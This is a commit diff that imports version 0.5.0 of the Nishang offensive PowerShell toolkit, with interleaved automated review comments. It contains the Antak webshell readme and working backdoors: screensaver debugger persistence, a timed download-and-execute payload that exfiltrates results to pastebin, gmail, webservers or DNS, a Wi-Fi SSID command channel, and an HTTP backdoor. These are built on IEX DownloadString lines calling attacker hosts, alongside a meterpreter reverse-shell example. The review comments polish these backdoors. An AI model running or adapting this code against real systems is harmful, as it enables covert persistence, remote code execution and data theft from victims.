Commit 51f02a27 authored by Sophie Brun

Imported Upstream version 0.5.0

parent d0cf1ec3
# Auto detect text files and perform LF normalization
* text=auto
# Custom for Visual Studio
*.cs diff=csharp
*.sln merge=union
*.csproj merge=union
*.vbproj merge=union
*.fsproj merge=union
*.dbproj merge=union
# Standard to msysgit
*.doc diff=astextplain
*.DOC diff=astextplain
*.docx diff=astextplain
*.DOCX diff=astextplain
*.dot diff=astextplain
*.DOT diff=astextplain
*.pdf diff=astextplain
*.PDF diff=astextplain
*.rtf diff=astextplain
*.RTF diff=astextplain
#################
## Eclipse
#################
*.pydevproject
.project
.metadata
bin/
tmp/
*.tmp
*.bak
*.swp
*~.nib
local.properties
.classpath
.settings/
.loadpath
# External tool builders
.externalToolBuilders/
# Locally stored "Eclipse launch configurations"
*.launch
# CDT-specific
.cproject
# PDT-specific
.buildpath
#################
## Visual Studio
#################
## Ignore Visual Studio temporary files, build results, and
## files generated by popular Visual Studio add-ons.
# User-specific files
*.suo
*.user
*.sln.docstates
# Build results
[Dd]ebug/
[Rr]elease/
x64/
build/
[Bb]in/
[Oo]bj/
# MSTest test Results
[Tt]est[Rr]esult*/
[Bb]uild[Ll]og.*
*_i.c
*_p.c
*.ilk
*.meta
*.obj
*.pch
*.pdb
*.pgc
*.pgd
*.rsp
*.sbr
*.tlb
*.tli
*.tlh
*.tmp
*.tmp_proj
*.log
*.vspscc
*.vssscc
.builds
*.pidb
*.log
*.scc
# Visual C++ cache files
ipch/
*.aps
*.ncb
*.opensdf
*.sdf
*.cachefile
# Visual Studio profiler
*.psess
*.vsp
*.vspx
# Guidance Automation Toolkit
*.gpState
# ReSharper is a .NET coding add-in
_ReSharper*/
*.[Rr]e[Ss]harper
# TeamCity is a build add-in
_TeamCity*
# DotCover is a Code Coverage Tool
*.dotCover
# NCrunch
*.ncrunch*
.*crunch*.local.xml
# Installshield output folder
[Ee]xpress/
# DocProject is a documentation generator add-in
DocProject/buildhelp/
DocProject/Help/*.HxT
DocProject/Help/*.HxC
DocProject/Help/*.hhc
DocProject/Help/*.hhk
DocProject/Help/*.hhp
DocProject/Help/Html2
DocProject/Help/html
# Click-Once directory
publish/
# Publish Web Output
*.Publish.xml
*.pubxml
# NuGet Packages Directory
## TODO: If you have NuGet Package Restore enabled, uncomment the next line
#packages/
# Windows Azure Build Output
csx
*.build.csdef
# Windows Store app package directory
AppPackages/
# Others
sql/
*.Cache
ClientBin/
[Ss]tyle[Cc]op.*
~$*
*~
*.dbmdl
*.[Pp]ublish.xml
*.pfx
*.publishsettings
# RIA/Silverlight projects
Generated_Code/
# Backup & report files from converting an old project file to a newer
# Visual Studio version. Backup files are not needed, because we have git ;-)
_UpgradeReport_Files/
Backup*/
UpgradeLog*.XML
UpgradeLog*.htm
# SQL Server files
App_Data/*.mdf
App_Data/*.ldf
#############
## Windows detritus
#############
# Windows image file caches
Thumbs.db
ehthumbs.db
# Folder config file
Desktop.ini
# Recycle Bin used on file shares
$RECYCLE.BIN/
# Mac crap
.DS_Store
#############
## Python
#############
*.py[co]
# Packages
*.egg
*.egg-info
dist/
build/
eggs/
parts/
var/
sdist/
develop-eggs/
.installed.cfg
# Installer logs
pip-log.txt
# Unit test / coverage reports
.coverage
.tox
#Translations
*.mo
#Mr Developer
.mr.developer.cfg
#TODO
TODO.txt
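Review bot: several ignore patterns are listed more than once and should be deduplicated: `*.tmp` appears in both the Eclipse and Visual Studio blocks, `*.log` twice inside the Visual Studio block, `build/` in both the Visual Studio and Python blocks, and `*.Publish.xml` is already covered by `*.[Pp]ublish.xml`. The unanchored directory patterns `bin/`, `tmp/`, `sql/` and `build/` also match at any depth, so a new directory with one of those names would be left out of commits without notice; prefix them with `/` if only the top level is meant.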
Antak is a webshell written in C#.Net which utilizes powershell.
Antak is a part of Nishang and updates could be found here:
Antak is a webshell written in ASP.Net which utilizes PowerShell.
Antak is a part of Nishang and updates can be found here:
https://github.com/samratashok/nishang
Use this shell as a normal powershell console. Each command is executed in a new process, keep this in mind
Use this shell as a normal PowerShell console. Each command is executed in a new process; keep this in mind
while using commands (like changing current directory or running session aware scripts).
Executing PowerShell scripts on the target -
Executing PowerShell scripts on the target:
1. Paste the script in command textbox and click 'Encode and Execute'. A reasonably large script could be executed using this.
1. Paste the script in command textbox and click 'Encode and Execute." A reasonably large script could be executed using this.
2. Use powershell one-liner (example below) for download & execute in the command box.
2. Use PowerShell one-liner (example below) to download & execute in the command box.
IEX ((New-Object Net.WebClient).DownloadString('URL to script here')); [Arguments here]
3. By uploading the script to the target and executing it.
3. Upload the script to the target and execute it.
4. Make the script a semi-colon separated one-liner.
Files can be uploaded and downloaded using the respective buttons:
Files can be uploaded and downloaded using the respective buttons.
Uploading a file:
To upload a file, you must mention the actual path on the server (with write permissions) in the command text box.
(OS temporary directories like C:\Windows\Temp may be writable.)
Then, use the browse and upload buttons to upload file to that path.
Uploading a file -
To upload a file you must mention the actual path on server (with write permissions) in command textbox.
(OS temporary directory like C:\Windows\Temp may be writable.)
Then use Browse and Upload buttons to upload file to that path.
Downloading a file -
To download a file enter the actual path on the server in command textbox.
Downloading a file:
To download a file, enter the actual path on the server in the command text box.
Then click on Download button.
A detailed blog post on Antak could be found here
A detailed blog post on Antak can be found here:
http://www.labofapenetrationtester.com/2014/06/introducing-antak.html
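Review bot: in the replacement text for step 1 the button name opens with a single quote and closes with a double quote ('Encode and Execute."); close it with a single quote as the original line did. The rewritten upload section also says "command text box" while steps 1 and 2 still say "command textbox" and "command box"; pick one term for the same control.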
function Add-ScrnSaveBackdoor
{
<#
.SYNOPSIS
Nishang Script which could set Debugger registry keys for a screensaver to remotely execute commands and scripts.
.DESCRIPTION
The script reads the value of Windows registry key HKEY_CURRENT_USER\Control Panel\Desktop\SCRNSAVE.EXE
to check for the existing Screensaver. If none exists, one from the default ones which exist in C:\Windows\System32 is used.
A Debugger to the screensaver is created at HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\.
It is the value of the "Debugger" to this key where it writes the payload. A screensaver selected from the default ones is added to this payload.
When the payload is executed, the screensaver also runs after it to make it appear legit. Change the contents of the payload URL
to execute different scripts using the same backdoor.
.PARAMETER Payload
Payload which you want execute on the target.
.PARAMETER PayloadURL
URL of the powershell script which would be executed on the target.
.PARAMETER Arguments
Arguments to the powershell script to be executed on the target.
.PARAMETER NewScreenSaver
Full path to the screensaver to be used if none is being used. Default is C:\Windows\System32\Ribbons.scr
.EXAMPLE
PS > Add-ScrnSaveBackdoor -Payload "powershell.exe -ExecutionPolicy Bypass -noprofile -noexit -c Get-Process"
Use above command to provide your own payload to be executed.
.EXAMPLE
PS > Add-ScrnSaveBackdoor -PayloadURL http://192.168.254.1/FireBuster.ps1 -Arguments "FireBuster 192.168.254.1 8440-8445"
Use above to execute FireBuster from Nishang for Egress Testing.
.EXAMPLE
PS > Add-ScrnSaveBackdoor -PayloadURL http://192.168.254.1/Powerpreter.psm1 -Arguments HTTP-Backdoor "http://pastebin.com/raw.php?i=jqP2vJ3x http://pastebin.com/raw.php?i=Zhyf8rwh start123 stopthis
Use above to execute HTTP-Backdoor from Powerpreter
.EXAMPLE
PS > Add-ScrnSaveBackdoor -PayloadURL http://192.168.254.1/code_exec.ps1
Use above to execute an in-memory meterpreter in PowerShell format generated using msfvenom
(./msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.254.226 -f powershell)
.LINK
http://www.labofapenetrationtester.com/2015/02/using-windows-screensaver-as-backdoor.html
https://github.com/samratashok/nishang
#>
[CmdletBinding()] Param(
[Parameter(Position = 0, Mandatory = $False)]
[String]
$Payload,
[Parameter(Position = 1, Mandatory = $False)]
[String]
$PayloadURL,
[Parameter(Position = 2, Mandatory = $False)]
[String]
$Arguments,
[Parameter(Position = 3, Mandatory = $False)]
[String]
$NewScreenSaver = "C:\Windows\System32\Ribbons.scr"
)
#Check if ScreenSaver is enabled
#If no enable it, if yes, get its value
if ((Get-Item "HKCU:\Control Panel\Desktop\").GetValue("SCRNSAVE.EXE") -eq $null)
{
New-ItemProperty "HKCU:\Control Panel\Desktop\" -Name SCRNSAVE.EXE -Value $NewScreenSaver -PropertyType String
$ScreenSaverName = ($NewScreenSaver -split '\\')[-1]
}
else
{
$ScreenSaverName = ((Get-Item "HKCU:\Control Panel\Desktop\").GetValue("SCRNSAVE.EXE") -split '\\')[-1]
}
#Set ScreenSaveTimeOut which is necessary to enable screensaver.
if ((Get-Item "HKCU:\Control Panel\Desktop\").GetValue("ScreenSaveTimeOut") -eq $null)
{
New-ItemProperty "HKCU:\Control Panel\Desktop\" -Name ScreenSaveTimeOut -Value 60 -PropertyType String
}
else
{
Set-ItemProperty "HKCU:\Control Panel\Desktop\" -Name ScreenSaveTimeOut -Value 60
}
#Get a list of default screensavers and select one at random
$ListScrn = Get-ChildItem C:\Windows\System32\*.scr | Where-Object {$_.Name -ne $ScreenSaverName}
$PathToScreensaver = Get-Random $ListScrn
#Add a default screensaver to payload so that it runs after our payload.
if(!$Payload)
{
$RegValue = "powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -nologo -noprofile -c IEX ((New-Object Net.WebClient).DownloadString('$PayloadURL'));$Arguments" + ";" + $PathToScreensaver + " /s"
}
elseif ($Payload)
{
$RegValue = $Payload + ";" + $Arguments + ";" + $PathToScreensaver + " /s"
}
#Set Debugger for the ScreenSaver executable
if (Test-Path -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$ScreenSaverName")
{
Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$ScreenSaverName" -Name Debugger -Value $RegValue
Write-Output "Payload added as Debugger for $ScreenSaverName"
}
else
{
New-Item "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$ScreenSaverName"
Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$ScreenSaverName" -Name Debugger -Value $RegValue
Write-Output "Payload added as Debugger for $ScreenSaverName"
}
}
\ No newline at end of file
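Review bot: the function overwrites ScreenSaveTimeOut (Set-ItemProperty ... -Value 60) and any existing Debugger value under Image File Execution Options without recording what was there, so there is nothing to restore the host from after a test; write the previous values out with Write-Output before changing them and document the keys touched. Neither -Payload nor -PayloadURL is mandatory, so a call with no parameters still writes a Debugger value built from an empty URL; make them separate mandatory parameter sets. In the help, the Powerpreter .EXAMPLE has an unbalanced double quote in -Arguments, and the file is missing its final newline.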
function Execute-OnTime
{
<#
.SYNOPSIS
Nishang Payload which waits till given time to execute a script.
.DESCRIPTION
This payload waits till the given time (on the victim)
and then downloads a PowerShell script and executes it.
This payload waits till the given time (on the victim) and then downloads a PowerShell script and executes it.
If using DNS or Webserver ExfilOption, use Invoke-Decode.ps1 in the Utility folder to decode.
.PARAMETER PayloadURL
The URL from where the file would be downloaded.
.PARAMETER Arguments
Arguments to be passed to a script. Powerpreter and other scripts in Nishang need the function name and arguments here.
.PARAMETER time
The Time when the payload will be executed (in 24 hour format e.g. 23:21).
......@@ -40,24 +47,27 @@ Password for the pastebin/gmail account where data would be exfiltrated.
Unused for other options
.PARAMETER URL
The URL of the webserver where POST requests would be sent.
The URL of the webserver where POST requests would be sent. The Webserver must beb able to log the POST requests.
The encoded values from the webserver could be decoded bby using Invoke-Decode from Nishang.
.PARAMETER DomainName
The DomainName, whose subdomains would be used for sending TXT queries to.
The DomainName, whose subdomains would be used for sending TXT queries to. The DNS Server must log the TXT queries.
.PARAMETER AuthNS
Authoritative Name Server for the domain specified in DomainName
Authoritative Name Server for the domain specified in DomainName. Using it may increase chances of detection.
Usually, you should let the Name Server of target to resolve things for you.
.EXAMPLE
PS > Execute-OnTime http://example.com/script.ps1 hh:mm http://pastebin.com/raw.php?i=Zhyf8rwh stoppayload
PS > Execute-OnTime -PayloadURL http://pastebin.com/raw.php?i=Zhyf8rwh -Arguments Get-Information -Time hh:mm -CheckURL http://pastebin.com/raw.php?i=Zhyf8rwh -StopString stoppayload
Use above when using the payload from non-interactive shells.
EXAMPLE
PS > Execute-OnTime http://pastebin.com/raw.php?i=Zhyf8rwh hh:mm http://pastebin.com/raw.php?i=jqP2vJ3x stoppayload -exfil -ExfilOption Webserver -URL http://192.168.254.183/catchpost.php>
PS > Execute-OnTime PayloadURL http://pastebin.com/raw.php?i=Zhyf8rwh -Arguments Get-Information -Time hh:mm -CheckURL http://pastebin.com/raw.php?i=Zhyf8rwh -StopString stoppayload -exfil -ExfilOption Webserver -URL http://192.168.254.183/catchpost.php
Use above when using the payload from non-interactive shells.
Exfiltrate results to a webserver which logs POST requests.
.EXAMPLE
PS > Execute-OnTime -persist
PS > Execute-OnTime -PayloadURL http://example.com/script.ps1 -Time hh:mm -CheckURL http://pastebin.com/raw.php?i=Zhyf8rwh -StopString stoppayload -exfil -ExfilOption Webserver -URL http://192.168.254.183/catchpost.php -persist
Use above for reboot persistence.
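Review bot: the added help text under .PARAMETER URL has two typos ("beb able", "bby using"). The second example's keyword reads "EXAMPLE" without the leading dot, so comment-based help will not treat it as its own example, and the new command under it has "PayloadURL" without the leading dash, so it does not match the named-parameter form used in the other examples.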
......@@ -67,12 +77,6 @@ https://github.com/samratashok/nishang
#>
function Execute-OnTime
{
[CmdletBinding(DefaultParameterSetName="noexfil")] Param(
[Parameter(Parametersetname="exfil")]
[Switch]
......@@ -87,58 +91,64 @@ function Execute-OnTime
[String]
$PayloadURL,
[Parameter(Position = 1, Mandatory = $True, Parametersetname="exfil")]
[Parameter(Position = 1, Mandatory = $True, Parametersetname="noexfil")]
[Parameter(Position = 1, Mandatory = $False, Parametersetname="exfil")]
[Parameter(Position = 1, Mandatory = $False, Parametersetname="noexfil")]
[String]
$time,
$Arguments = "Out-Null",
[Parameter(Position = 2, Mandatory = $True, Parametersetname="exfil")]
[Parameter(Position = 2, Mandatory = $True, Parametersetname="noexfil")]
[String]
$CheckURL,
$time,
[Parameter(Position = 3, Mandatory = $True, Parametersetname="exfil")]
[Parameter(Position = 3, Mandatory = $True, Parametersetname="noexfil")]
[String]
$CheckURL,
[Parameter(Position = 4, Mandatory = $True, Parametersetname="exfil")]
[Parameter(Position = 4, Mandatory = $True, Parametersetname="noexfil")]
[String]
$StopString,
[Parameter(Position = 4, Mandatory = $False, Parametersetname="exfil")] [ValidateSet("gmail","pastebin","WebServer","DNS")]
[Parameter(Position = 5, Mandatory = $False, Parametersetname="exfil")] [ValidateSet("gmail","pastebin","WebServer","DNS")]
[String]
$ExfilOption,
[Parameter(Position = 5, Mandatory = $False, Parametersetname="exfil")]
[Parameter(Position = 6, Mandatory = $False, Parametersetname="exfil")]
[String]
$dev_key = "null",
[Parameter(Position = 6, Mandatory = $False, Parametersetname="exfil")]
[Parameter(Position = 7, Mandatory = $False, Parametersetname="exfil")]
[String]
$username = "null",
[Parameter(Position = 7, Mandatory = $False, Parametersetname="exfil")]
[Parameter(Position = 8, Mandatory = $False, Parametersetname="exfil")]
[String]
$password = "null",
[Parameter(Position = 8, Mandatory = $False, Parametersetname="exfil")]
[Parameter(Position = 9, Mandatory = $False, Parametersetname="exfil")]
[String]
$URL = "null",
[Parameter(Position = 9, Mandatory = $False, Parametersetname="exfil")]
[Parameter(Position = 10, Mandatory = $False, Parametersetname="exfil")]
[String]
$DomainName = "null",
[Parameter(Position = 10, Mandatory = $False, Parametersetname="exfil")]
[Parameter(Position = 11, Mandatory = $False, Parametersetname="exfil")]
[String]
$AuthNS = "null"
)
$body = @'
function Logic-Execute-OnTime ($PayloadURL, $time, $CheckURL, $StopString, $ExfilOption, $dev_key, $username, $password, $URL, $DomainName, $AuthNS, $exfil)
function Logic-Execute-OnTime ($PayloadURL, $Arguments, $time, $CheckURL, $StopString, $ExfilOption, $dev_key, $username, $password, $URL, $DomainName, $AuthNS, $exfil)
{
$exec = 0
while($true)
{
$exec = 0
start-sleep -seconds 5
$webclient = New-Object System.Net.WebClient
$filecontent = $webclient.DownloadString("$CheckURL")
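Review bot: adding $Arguments at Position = 1 moves $time, $CheckURL and $StopString to positions 2, 3 and 4, so a caller still using the old positional order (URL, then hh:mm, as in the removed example) now binds the time string to $Arguments and every later value shifts by one. State in the help that positional calls changed, or give $Arguments no Position so it is named-only. The default value "Out-Null" is also a magic string that the .PARAMETER Arguments text does not mention.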
......@@ -147,6 +157,11 @@ function Logic-Execute-OnTime ($PayloadURL, $time, $CheckURL, $StopString, $Exfi
{
$pastevalue = Invoke-Expression $webclient.DownloadString($PayloadURL)
# Check for arguments to the downloaded script.
if ($Arguments -ne "Out-Null")
{
$pastevalue = Invoke-Expression $Arguments
}
$pastevalue
$exec++
if ($exfil -eq $True)
......@@ -193,7 +208,7 @@ function Do-Exfiltration($pastename,$pastevalue,$ExfilOption,$dev_key,$username,
$sw.Close()
# Base64 encode stream
$code = [Convert]::ToBase64String($ms.ToArray())
$code
return $code
}
if ($exfiloption -eq "pastebin")
......@@ -227,7 +242,6 @@ function Do-Exfiltration($pastename,$pastevalue,$ExfilOption,$dev_key,$username,
elseif ($exfiloption -eq "webserver")
{
$Data = Compress-Encode
$Data
post_http $URL $Data
}
elseif ($ExfilOption -eq "DNS")
......@@ -255,11 +269,11 @@ function Do-Exfiltration($pastename,$pastevalue,$ExfilOption,$dev_key,$username,
{
$name = "persist.vbs"
$options = "Logic-Execute-OnTime $PayloadURL $time $CheckURL $StopString $dev_key $username $password $keyoutoption $exfil"
$options = "Logic-Execute-OnTime $PayloadURL $Arguments $time $CheckURL $StopString $dev_key $username $password $keyoutoption $exfil"
if ($exfil -eq $True)
{
$options = "Logic-Execute-OnTime $PayloadURL $time $CheckURL $StopString $ExfilOption $dev_key $username $password $URL $DomainName $AuthNS $exfil"
$options = "Logic-Execute-OnTime $PayloadURL $Arguments $time $CheckURL $StopString $ExfilOption $dev_key $username $password $URL $DomainName $AuthNS $exfil"
}
Out-File -InputObject $body -Force $env:TEMP\$modulename
Out-File -InputObject $exfiltration -Append $env:TEMP\$modulename
......@@ -291,10 +305,10 @@ function Do-Exfiltration($pastename,$pastevalue,$ExfilOption,$dev_key,$username,
}
else
{
$options = "Logic-Execute-OnTime $PayloadURL $time $CheckURL $StopString $dev_key $username $password $keyoutoption $exfil"
$options = "Logic-Execute-OnTime $PayloadURL $Arguments $time $CheckURL $StopString $dev_key $username $password $keyoutoption $exfil"
if ($exfil -eq $True)
{
$options = "Logic-Execute-OnTime $PayloadURL $time $CheckURL $StopString $ExfilOption $dev_key $username $password $URL $DomainName $AuthNS $exfil"
$options = "Logic-Execute-OnTime $PayloadURL $Arguments $time $CheckURL $StopString $ExfilOption $dev_key $username $password $URL $DomainName $AuthNS $exfil"
}
Out-File -InputObject $body -Force $env:TEMP\$modulename
Out-File -InputObject $exfiltration -Append $env:TEMP\$modulename
......

function Gupt-Backdoor
{
<#
.SYNOPSIS
Gupt is a backdoor in Nishang which could execute commands and scripts from specially crafted Wireless Network Names.
.DESCRIPTION
Gupt looks for a specially crafted Wireless Network Name/SSID from list of all avaliable networks. It matches first four characters of
each SSID with the parameter MagicString. On a match, if the 5th character is a 'c', rest of the SSID name is considered to be a command and
exeucted. If the 5th character is a 'u', rest of the SSID is considered the id part of Google URL Shortener and a script is downloaded and
executed in memory from the URL. See examples for usage.
Gupt does not connect to any Wireless network and this makes it more stealthy and helps in bypassing network traffic monitoring.
.PARAMETER MagicString
The string which Gupt would compare with the available SSIDs.
.PARAMETER Arguments
Arguments to pass to a downloaded script.
.EXAMPLE
PS > Gupt-Backdoor -MagicString op3n -Verbose
In above, Gupt will look for an SSID starting with "op3n". To execute whoami on the target, the wireless network name should be "op3ncwhoami".
PS > Gupt-Backdoor -MagicString op3n -Verbose
In above, Gupt will look for an SSID starting with "op3n". To execute a powershell script on the target, the wireless network name should be
"op3nunJEuug". Here, Gupt will use of characters after the 5th one and make the URL http://goo.gl/nJEuug. A script hosted at the URL resolved
by the Google shortener would be downloaded and executed.
.LINK
http://www.labofapenetrationtester.com/2014/08/Introducing-Gupt.html
https://github.com/samratashok/nishang
#>
[CmdletBinding()] Param(
[Parameter(Position=0, Mandatory = $True)]
[String]
$MagicString,
[Parameter(Position=1, Mandatory = $False)]
[String]
$Arguments
)
#Get list of available Wlan networks
while($True)
{
Write-Verbose "Checking wireless networks for instructions."
$networks = Invoke-Expression "netsh wlan show network"
$ssid = $networks | Select-String "SSID"
$NetworkNames = $ssid -replace ".*:" -replace " "
ForEach ($network in $NetworkNames)
{
#Check if the first four characters of our SSID matches the given MagicString
if ($network.Substring(0,4) -match $MagicString.Substring(0,4))
{
Write-Verbose "Found a network with instructions!"
#If the netowrk SSID contains fifth chracter "u", it means rest of the SSID is a URL
if ($network.Substring(4)[0] -eq "u")
{
Write-Verbose "Downloading the attack script and executing it in memory."
$PayloadURL = "http://goo.gl/" + $network.Substring(5)
$webclient = New-Object System.Net.WebClient
Invoke-Expression $webclient.DownloadString($PayloadURL)
if ($Arguments)
{
Invoke-Expression $Arguments
}
Start-Sleep -Seconds 10
}
elseif ($network.Substring(4)[0] -eq "c")
{
$cmd = $network.Substring(5)
if ($cmd -eq "exit")
{
break
}
Write-Verbose "Command `"$cmd`" found. Executing it."
Invoke-Expression $cmd
Start-Sleep -Seconds 10
}
}
}
Start-Sleep -Seconds 5
}
}
\ No newline at end of file
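Review bot: on the line `if ($network.Substring(0,4) -match $MagicString.Substring(0,4))` the four-character prefix is the only check before SSID text reaches Invoke-Expression, and -match treats that prefix as a regular expression rather than a literal, so any access point in radio range of the test host whose name matches gets code run on it. The .DESCRIPTION should state that exposure and the comparison should be a literal -eq. The help text also has typos ("avaliable", "exeucted", and "netowrk", "chracter" in the inline comment), and the second sample command has no .EXAMPLE keyword of its own, so both commands are rendered as one example.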
function HTTP-Backdoor
{
<#
.SYNOPSIS
Nishang Payload which queries a URL for instructions and then downloads and executes a powershell script.
......@@ -6,7 +8,8 @@ Nishang Payload which queries a URL for instructions and then downloads and exec
.DESCRIPTION
This payload queries the given URL and after a suitable command (given by MagicString variable) is found,
it downloads and executes a powershell script. The payload could be stopped remotely if the string at CheckURL matches
the string given in StopString variable. By using the exfile parameter, it would be possible to
the string given in StopString variable.
If using DNS or Webserver ExfilOption, use Invoke-Decode.ps1 in the Utility folder to decode.
.PARAMETER CheckURL
The URL which the payload would query for instructions.
......@@ -14,6 +17,9 @@ The URL which the payload would query for instructions.
.PARAMETER PayloadURL
The URL from where the powershell script would be downloaded.
.PARAMETER Arguments
Arguments to be passed to a script. Powerpreter and other scripts in Nishang need the function name and arguments here.
.PARAMETER MagicString
The string which would act as an instruction to the payload to proceed with download and execute.
......@@ -42,13 +48,15 @@ Password for the pastebin/gmail account where data would be exfiltrated.
Unused for other options
.PARAMETER URL
The URL of the webserver where POST requests would be sent.
The URL of the webserver where POST requests would be sent. The Webserver must beb able to log the POST requests.